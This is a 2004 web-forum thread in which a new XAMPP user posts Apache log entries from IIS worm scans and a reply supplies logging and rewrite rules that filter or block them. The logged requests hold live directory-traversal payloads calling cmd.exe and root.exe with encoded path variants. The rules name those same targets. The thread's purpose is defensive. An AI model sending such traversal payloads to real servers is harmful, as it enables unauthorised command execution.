Apache access.log

Problems with the Windows version of XAMPP, questions, comments, and anything related.

Apache access.log

Postby motordude » 30. December 2004 08:47

I am not sure if this is the place to post this but I'll try it. I am rather new tosetting up a webserver and am still exploring. I was looking at my apache access log and found something I am not sure what it means.

Here is a part of the log, sorry for the length


68.77.21.52 - - [29/Dec/2004:19:29:03 -0500] "SEARCH /\x90\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02 ... " 414 309
68.77.132.153 - - [29/Dec/2004:20:01:37 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 401 454
68.77.132.153 - - [29/Dec/2004:20:01:38 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 401 454
68.77.132.153 - - [29/Dec/2004:20:01:38 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 454
68.77.132.153 - - [29/Dec/2004:20:01:39 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 454
68.77.132.153 - - [29/Dec/2004:20:01:39 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 454
68.77.132.153 - - [29/Dec/2004:20:01:40 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 454
68.77.132.153 - - [29/Dec/2004:20:01:40 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 454
68.77.132.153 - - [29/Dec/2004:20:01:41 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 454
68.77.132.153 - - [29/Dec/2004:20:01:41 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 454
68.77.132.153 - - [29/Dec/2004:20:01:42 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 288
68.77.132.153 - - [29/Dec/2004:20:01:43 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 454
68.77.132.153 - - [29/Dec/2004:20:01:43 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 454
68.77.132.153 - - [29/Dec/2004:20:01:44 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 279
68.77.132.153 - - [29/Dec/2004:20:01:44 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 279
68.77.132.153 - - [29/Dec/2004:20:01:44 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 454
68.77.132.153 - - [29/Dec/2004:20:01:44 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 454
68.77.132.153 - - [29/Dec/2004:21:36:45 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 401 454
68.77.132.153 - - [29/Dec/2004:21:36:45 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 401 454
68.77.132.153 - - [29/Dec/2004:21:36:46 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 454
68.77.132.153 - - [29/Dec/2004:21:36:49 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 454
68.77.132.153 - - [29/Dec/2004:21:36:50 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 454
68.77.132.153 - - [29/Dec/2004:21:36:50 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 454
68.77.132.153 - - [29/Dec/2004:21:36:51 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 454
68.77.132.153 - - [29/Dec/2004:21:36:51 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 454
68.77.132.153 - - [29/Dec/2004:21:36:52 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 454
68.77.132.153 - - [29/Dec/2004:21:36:52 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 288
68.77.132.153 - - [29/Dec/2004:21:36:53 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 454
68.77.132.153 - - [29/Dec/2004:21:36:53 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 454
68.77.132.153 - - [29/Dec/2004:21:36:53 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 279
68.77.132.153 - - [29/Dec/2004:21:36:54 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 279
68.77.132.153 - - [29/Dec/2004:21:36:54 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 454
68.77.132.153 - - [29/Dec/2004:21:36:55 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 454

What is that search? And what is the "GET /Scripts portion as well. I am restricting access using .htaccess other than that I dont have anything else on the site yet. Thanks in advance
motordude
 
Posts: 1
Joined: 30. December 2004 08:45

Postby Maller » 30. December 2004 10:03

I belive this is IIS worms, witch dosent effect apache webserver, but just fill up your log files .... !
There are several ways of getting theese notices out of your logs, etc using mod_log_config
Code: Select all
<IfModule mod_log_config.c>
  SetEnvIf Request_URI "cmd\.exe" trash
  SetEnvIf Request_URI "root\.exe" trash
  SetEnvIf Request_URI "shell\.exe" trash
  SetEnvIf Request_URI "default\.ida" trash
  SetEnvIf Request_URI "wpad\.dat" trash

  LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-agent}i\"" combined
  CustomLog logs/access_log combined env=!trash
  CustomLog logs/trash_log combined env=trash

  <IfModule mod_deflate.c>
    DeflateFilterNote Input instream
    DeflateFilterNote Output outstream
    DeflateFilterNote Ratio ratio
    LogFormat '"%r" %{outstream}n/%{instream}n (%{ratio}n%%)' deflate
    CustomLog logs/deflate_log deflate env=!trash
  </IfModule>
</IfModule>

You could also make a .htaccess file with the following txt in.
Code: Select all
<IfModule mod_rewrite.so>
    RewriteEngine On
    RewriteLog c:/apache2/logs/apdtech_rewrite.log
    RewriteLogLevel 0

    # block user agents
    RewriteCond %{HTTP_USER_AGENT} ^.*MSFrontpage.*$ [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} ^.*Frontpage.*$ [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} ^.*Backweb.*$ [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} ^.*Bandit.*$ [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} ^.*Ants.*$ [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} ^.*Buddy.*$ [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} ^.*zip.*$ [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} ^.*Crawler.*$ [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} ^.*Wget.*$ [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} ^.*Grabber.*$ [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} ^.*Sucker.*$ [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} ^.*Downloader.*$ [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} ^.*Siphon.*$ [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} ^.*Collector.*$ [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} ^.*Snagger.*$ [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} ^.*Widow.*$ [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} ^.*Snake.*$ [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} ^.*Vacuum.*$ [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} ^.*Pump.*$ [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} ^.*Teleport.*$ [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} ^.*Reaper.*$ [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} ^.*Mag-Net.*$ [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} ^.*Memo.*$ [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} ^.*pcBrowser.*$ [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} ^.*leech.*$ [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} ^.*Stripper.*$ [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} ^.*Offline.*$ [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} ^.*Copier.*$ [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} ^.*Mirror.*$ [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} ^.*mister.*$ [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} ^.*HMView.*$ [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} ^.*HTTrack.*$ [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} ^.*JOC.*$ [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} ^.*likse.*$ [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} ^.*Recorder.*$
    RewriteRule ^/.+ - [F]

    # block viruses and script kiddies
    RewriteCond %{THE_REQUEST} default.ida
    RewriteRule ^.*$ - [G,L]

    RewriteCond %{THE_REQUEST} cmd.exe
    RewriteRule ^.*$ - [G,L]

    RewriteCond %{THE_REQUEST} root.exe
    RewriteRule ^.*$ - [G,L]

    RewriteCond %{THE_REQUEST} /scripts/
    RewriteRule ^.*$ - [G,L]

    RewriteCond %{THE_REQUEST} _vti_
    RewriteRule ^.*$ - [G,L]

    RewriteCond %{THE_REQUEST} shell.exe
    RewriteRule ^.*$ - [G,L]

    RewriteCond %{THE_REQUEST} nsiislog.dll
    RewriteRule ^.*$ - [G,L]

    RewriteCond %{THE_REQUEST} msadcs.dll
    RewriteRule ^.*$ - [G,L]

</IfModule>
User avatar
Maller
 
Posts: 49
Joined: 06. March 2004 14:47


Return to XAMPP for Windows

Who is online

Users browsing this forum: No registered users and 74 guests